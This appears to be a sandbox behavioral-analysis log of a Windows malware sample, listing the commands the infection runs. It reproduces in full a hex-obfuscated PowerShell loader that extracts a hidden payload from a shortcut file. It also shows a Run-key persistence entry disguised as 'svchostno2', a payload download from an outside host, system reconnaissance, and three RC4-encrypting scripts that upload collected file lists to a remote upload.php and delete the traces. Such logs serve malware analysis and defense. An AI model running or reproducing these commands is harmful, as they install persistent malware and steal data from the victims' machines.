Behavioral Analysis

cmd.exe "C:\Windows\system32\cmd.exe" /c TaQcWieyVzmoZZLspqMFAIGfQCwRStErTKXqjOUIVUdBSWTecLuDBhkQkmObtXUpETGqvVSKrVZpjsAFtSErgAVQbyuEuatgyCsPkuFuAOSqUKkeGChhVJvmZBPqQpKMJuGPzmEGJdFiABHzgthU||goto&p^ow^e^rs^he^l^l -windowstyle hidden $dedicte="$loped='245A524D797547734D4E64644A203D204765742D4C6F636174696F6E3B2441485A6D7853435065696550564D476555203D204765742D4368696C644974656D202D5061746820245A524D797547734D4E64644A202D52656375727365202A2E6C6E6B207C2077686572652D6F626A656374207B245F2E6C656E677468202D6571202D6B5A524D792D7D207C2053656C6563742D4F626A656374202D457870616E6450726F70657274792046756C6C4E616D653B6966282441485A6D7853435065696550564D4765552E6C656E677468202D6571203029207B245A524D797547734D4E64644A203D2024656E763A54656D703B2441485A6D7853435065696550564D476555203D204765742D4368696C644974656D202D5061746820245A524D797547734D4E64644A202D52656375727365202A2E6C6E6B207C2077686572652D6F626A656374207B245F2E6C656E677468202D6571202D6B5A524D792D7D207C2053656C6563742D4F626A656374202D457870616E6450726F70657274792046756C6C4E616D653B7D3B245A524D797547734D4E64644A203D2053706C69742D50617468202441485A6D7853435065696550564D4765553B247154464679496B62565952203D204E65772D4F626A6563742053797374656D2E494F2E46696C6553747265616D282441485A6D7853435065696550564D4765552C205B53797374656D2E494F2E46696C654D6F64655D3A3A4F70656E2C205B53797374656D2E494F2E46696C654163636573735D3A3A52656164293B247154464679496B625659522E5365656B282D7547734D4E642D2C205B53797374656D2E494F2E5365656B4F726967696E5D3A3A426567696E293B2476476A777770706A5459786E634A614F203D204E65772D4F626A65637420627974655B5D202D644A4441485A6D2D3B247154464679496B625659522E52656164282476476A777770706A5459786E634A614F2C20302C202D644A4441485A6D2D293B24567148454F5476434870735871646663203D202441485A6D7853435065696550564D4765552E737562737472696E6728302C2441485A6D7853435065696550564D4765552E6C656E6774682D34293B666F722824693D303B2469202D6C74202476476A777770706A5459786E634A614F2E636F756E743B24692B2B29207B202476476A777770706A5459786E634A614F5B24695D203D202476476A777770706A5459786E634A614F5B24695D202D62786F722030783737207D2073632024567148454F5476434870735871646663202476476A777770706A5459786E634A614F202D456E636F64696E6720427974653B262024567148454F54764348707358716466633B247154464679496B625659522E5365656B282D78534350656965502D2C205B53797374656D2E494F2E5365656B4F726967696E5D3A3A426567696E293B24644E50744C676C6E4B5851427276613D4E65772D4F626A65637420627974655B5D202D564D476555507154462D3B247154464679496B625659522E526561642824644E50744C676C6E4B5851427276612C20302C202D564D476555507154462D293B247154464679496B625659522E436C6F736528293B52656D6F76652D4974656D202D50617468202441485A6D7853435065696550564D476555202D466F7263653B2456544F4E484345546863723D24656E763A7075626C6963202B20275C27202B20272D4679496B625659526D762D273B666F722824693D303B2469202D6C742024644E50744C676C6E4B5851427276612E636F756E743B24692B2B29207B2024644E50744C676C6E4B5851427276615B24695D203D2024644E50744C676C6E4B5851427276615B24695D202D62786F722030783737207D7363202456544F4E484345546863722024644E50744C676C6E4B585142727661202D456E636F64696E6720427974653B24524C55684C546571415441734474716F49203D206E65772D6F626A656374202D636F6D207368656C6C2E6170706C69636174696F6E3B2445706845594A57766D79744B77203D2024524C55684C546571415441734474716F492E4E616D657370616365282456544F4E48434554686372293B24524C55684C546571415441734474716F492E4E616D6573706163652824656E763A7075626C6963202B20275C27202B2027646F63756D656E747327292E436F707948657265282445706845594A57766D79744B772E6974656D7328292C203130343429207C206F75742D6E756C6C3B72656D6F76652D6974656D202D70617468202456544F4E48434554686372202D666F7263653B244F70757562635558546A3D24656E763A7075626C69632B275C646F63756D656E74735C73746172742E766273273B2620244F70757562635558546A3B';$bytes = for($i = 0; $i -lt $loped.Length;$i += 2){[System.Convert]::ToByte($loped.Substring($i, 2), 16);};$hoikd = [System.Text.Encoding]::ASCII.GetString($bytes);$hoikd = $hoikd -replace '-kZRMy-', '0x0002C186';$hoikd = $hoikd -replace '-uGsMNd-', '0x00003C22';$hoikd = $hoikd -replace '-dJDAHZm-', '0x00014000';$hoikd = $hoikd -replace '-xSCPeieP-', '0x00017C22';$hoikd = $hoikd -replace '-VMGeUPqTF-', '0x00014564';$hoikd = $hoikd -replace '-FyIkbVYRmv-', '20676.zip';Invoke-Expression $hoikd;";Invoke-Expression $dedicte;

reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v svchostno2 /t REG_SZ /d "C:\Users\Public\Documents\start.vbs" /f

powershell.exe powershell -command "$url = 'https://bgfile.com/v2/read/get.php?vw=ln3&nv=xu6502';$VcuqEzofhsTtIrLF = 'C:\Users\Public\Documents\49996.zip';iwr -Uri $url -OutFile $VcuqEzofhsTtIrLF;"

nslookup.exe nslookup myip.opendns.com resolver1.opendns.com

tasklist.exe tasklist

systeminfo.exe systeminfo

timeout.exe timeout -t 5 /nobreak

powershell.exe powershell -command "function ESTR{param ([Parameter(Mandatory=$true)] [string]$PlainText,[Parameter(Mandatory=$true)] [string]$Key);$plainBytes = [System.Text.Encoding]::UTF8.GetBytes($PlainText); $keyBytes = [System.Text.Encoding]::UTF8.GetBytes($Key);$s = New-Object byte[](256);$k = New-Object byte[](256);for ($i = 0; $i -lt 256; $i++) {$s[$i] = $i;$k[$i] = $keyBytes[$i % $keyBytes.Length];}$j = 0;for ($i = 0; $i -lt 256; $i++) {$j = ($j + $s[$i] + $k[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;}$encryptedBytes = New-Object byte[] $plainBytes.Length;$i = 0;$j = 0;for ($n = 0; $n -lt $plainBytes.Length; $n++) {$i = ($i + 1) % 256;$j = ($j + $s[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;$t = ($s[$i] + $s[$j]) % 256;$encryptedBytes[$n] = $plainBytes[$n] -bxor $s[$t];}$encryptedString = [System.Convert]::ToBase64String($encryptedBytes);return $encryptedString;}$key=(Get-Date).Ticks.ToString();$tDTVLEqumwVkQwuk='http://ttzcloud.com/upload.php';$fn='TEST22-PC_cuserdown.txt';$fp='C:\Users\Public\Documents\cuserdown.txt';$dt=gc -Path $fp -Raw | Out-String;Add-Type -AssemblyName 'System.Web';$fn=ESTR -PlainText $fn -Key $key;$dt=ESTR -PlainText $dt -Key $key;$query = [System.Web.HttpUtility]::ParseQueryString('');$query['fn']=$fn;$query['fd']=$dt;$query['r']=$key;$b=$query.ToString();$ba=[System.Text.Encoding]::UTF8.GetBytes($b);$r=[System.Net.WebRequest]::Create($tDTVLEqumwVkQwuk);$r.Method='POST';$r.ContentType='application/x-www-form-urlencoded';$r.ContentLength=$ba.Length;$rS = $r.GetRequestStream();$rS.Write($ba,0,$ba.Length);$rS.Close();$rp=$r.GetResponse();if($rp.StatusCode -eq [System.Net.HttpStatusCode]::OK){Remove-Item -Path $fp;$fpok='C:\Users\Public\Documents\upok.txt';New-Item -ItemType File -Path $fpok;}"

powershell.exe powershell -command "function ESTR{param ([Parameter(Mandatory=$true)] [string]$PlainText,[Parameter(Mandatory=$true)] [string]$Key);$plainBytes = [System.Text.Encoding]::UTF8.GetBytes($PlainText); $keyBytes = [System.Text.Encoding]::UTF8.GetBytes($Key);$s = New-Object byte[](256);$k = New-Object byte[](256);for ($i = 0; $i -lt 256; $i++) {$s[$i] = $i;$k[$i] = $keyBytes[$i % $keyBytes.Length];}$j = 0;for ($i = 0; $i -lt 256; $i++) {$j = ($j + $s[$i] + $k[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;}$encryptedBytes = New-Object byte[] $plainBytes.Length;$i = 0;$j = 0;for ($n = 0; $n -lt $plainBytes.Length; $n++) {$i = ($i + 1) % 256;$j = ($j + $s[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;$t = ($s[$i] + $s[$j]) % 256;$encryptedBytes[$n] = $plainBytes[$n] -bxor $s[$t];}$encryptedString = [System.Convert]::ToBase64String($encryptedBytes);return $encryptedString;}$key=(Get-Date).Ticks.ToString();$tDTVLEqumwVkQwuk='http://ttzcloud.com/upload.php';$fn='TEST22-PC_cuserdocu.txt';$fp='C:\Users\Public\Documents\cuserdocu.txt';$dt=gc -Path $fp -Raw | Out-String;Add-Type -AssemblyName 'System.Web';$fn=ESTR -PlainText $fn -Key $key;$dt=ESTR -PlainText $dt -Key $key;$query = [System.Web.HttpUtility]::ParseQueryString('');$query['fn']=$fn;$query['fd']=$dt;$query['r']=$key;$b=$query.ToString();$ba=[System.Text.Encoding]::UTF8.GetBytes($b);$r=[System.Net.WebRequest]::Create($tDTVLEqumwVkQwuk);$r.Method='POST';$r.ContentType='application/x-www-form-urlencoded';$r.ContentLength=$ba.Length;$rS = $r.GetRequestStream();$rS.Write($ba,0,$ba.Length);$rS.Close();$rp=$r.GetResponse();if($rp.StatusCode -eq [System.Net.HttpStatusCode]::OK){Remove-Item -Path $fp;$fpok='C:\Users\Public\Documents\upok.txt';New-Item -ItemType File -Path $fpok;}"

powershell.exe powershell -command "function ESTR{param ([Parameter(Mandatory=$true)] [string]$PlainText,[Parameter(Mandatory=$true)] [string]$Key);$plainBytes = [System.Text.Encoding]::UTF8.GetBytes($PlainText); $keyBytes = [System.Text.Encoding]::UTF8.GetBytes($Key);$s = New-Object byte[](256);$k = New-Object byte[](256);for ($i = 0; $i -lt 256; $i++) {$s[$i] = $i;$k[$i] = $keyBytes[$i % $keyBytes.Length];}$j = 0;for ($i = 0; $i -lt 256; $i++) {$j = ($j + $s[$i] + $k[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;}$encryptedBytes = New-Object byte[] $plainBytes.Length;$i = 0;$j = 0;for ($n = 0; $n -lt $plainBytes.Length; $n++) {$i = ($i + 1) % 256;$j = ($j + $s[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;$t = ($s[$i] + $s[$j]) % 256;$encryptedBytes[$n] = $plainBytes[$n] -bxor $s[$t];}$encryptedString = [System.Convert]::ToBase64String($encryptedBytes);return $encryptedString;}$key=(Get-Date).Ticks.ToString();$tDTVLEqumwVkQwuk='http://ttzcloud.com/upload.php';$fn='TEST22-PC_cuserdesk.txt';$fp='C:\Users\Public\Documents\cuserdesk.txt';$dt=gc -Path $fp -Raw | Out-String;Add-Type -AssemblyName 'System.Web';$fn=ESTR -PlainText $fn -Key $key;$dt=ESTR -PlainText $dt -Key $key;$query = [System.Web.HttpUtility]::ParseQueryString('');$query['fn']=$fn;$query['fd']=$dt;$query['r']=$key;$b=$query.ToString();$ba=[System.Text.Encoding]::UTF8.GetBytes($b);$r=[System.Net.WebRequest]::Create($tDTVLEqumwVkQwuk);$r.Method='POST';$r.ContentType='application/x-www-form-urlencoded';$r.ContentLength=$ba.Length;$rS = $r.GetRequestStream();$rS.Write($ba,0,$ba.Length);$rS.Close();$rp=$r.GetResponse();if($rp.StatusCode -eq [System.Net.HttpStatusCode]::OK){Remove-Item -Path $fp;$fpok='C:\Users\Public\Documents\upok.txt';New-Item -ItemType File -Path $fpok;}"